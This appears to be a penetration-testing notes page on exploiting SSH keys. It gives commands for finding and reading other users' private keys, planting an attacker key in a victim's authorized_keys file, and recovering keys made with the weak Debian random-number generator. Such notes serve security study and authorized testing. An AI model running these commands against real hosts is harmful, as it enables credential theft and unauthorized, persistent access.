SSH Key
The main two ways of exploiting SSH keys are the following:
Accessing readable private SSH keys and using them to authenticate
Accessing writable public SSH keys and adding your own one to them to authenticate
Public and private keys are generally stored in one of the following locations:
/root/.ssh/
/home/user_name/.ssh/ (users home directory)
/etc/ssh/
in the paths specified in the ssh_config or sshd_config config files
The following commands can be used to identify any existing public or private keys and their permissions:
ls -la /home /root /etc/ssh /home/*/.ssh/; locate id_rsa; locate id_dsa; find / -name id_rsa 2> /dev/null; find / -name id_dsa 2> /dev/null; find / -name authorized_keys 2> /dev/null; cat /home/*/.ssh/id_rsa; cat /home/*/.ssh/id_dsa
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
1. Readable Private Keys
The easiest way to exploit this is to simply copy the key over to a Kali host trough a python simple server or other sharing technic or by simply copying and pasting the contents of the file.
In order for the private key to be accepted by SSH, it needs to be only readable and writable only by its owner, otherwise it will complain that the permissions applied are too open.
Using the following command to change the file permissions against the newly created SSH private key:
chmod 600 key_name
Then be can connect:
ssh -i key_name user_name@X.X.X.X
Note: When access services that allow file sharing such as FTP, SMB, HTTP etc is allowed, common SSH keys directories should be checked for open private keys.
2. Writable Public Keys
If the authorized_keys file is writable to the current user, this can be exploited by adding additional authorized keys.
The easiest way to exploit this is to generate a new SSH key pair, add the public key to the file and login in using the private key.
The ssh-keygen command line utility can be used to generate a new SSH key pair.
Then we copy the contents and copy into the victim writable public key:
In our machine: cat ~/.ssh/id_rsa.pub | xclip -selection c
Then in victim machine: echo "[ctrl+shift+c]" >> /home/victim_username/.ssh/authorized_keys
This allows to login to the server via SSH without having to specify any private keys.
3. SSH Key Predictable PRNG (Authorized_Keys) Process
This module describes how to attempt to use an obtained authorized_keys file on a host system.
Needed : SSH-DSS String from authorized_keys file
Steps:
Get the authorized_keys file.
An example of this file would look like so:
ssh-dss AAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ...
Since this is an ssh-dss key, we need to add that to our local copy of /etc/ssh/ssh_config and /etc/ssh/sshd_config:
echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config
echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshd_config
/etc/init.d/ssh restart
Get g0tmi1k's debian-ssh repository and unpack the keys:
git clone https://github.com/g0tmi1k/debian-ssh
cd debian-ssh
tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2
Grab the first 20 or 30 bytes from the key file shown above starting with the "AAAA..." portion and grep the unpacked keys with it as:
grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf'
dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub
IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do:
ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934
And you should connect without requiring a password. If stuck, the -vvv verbosity should provide enough details as to why.
Last updated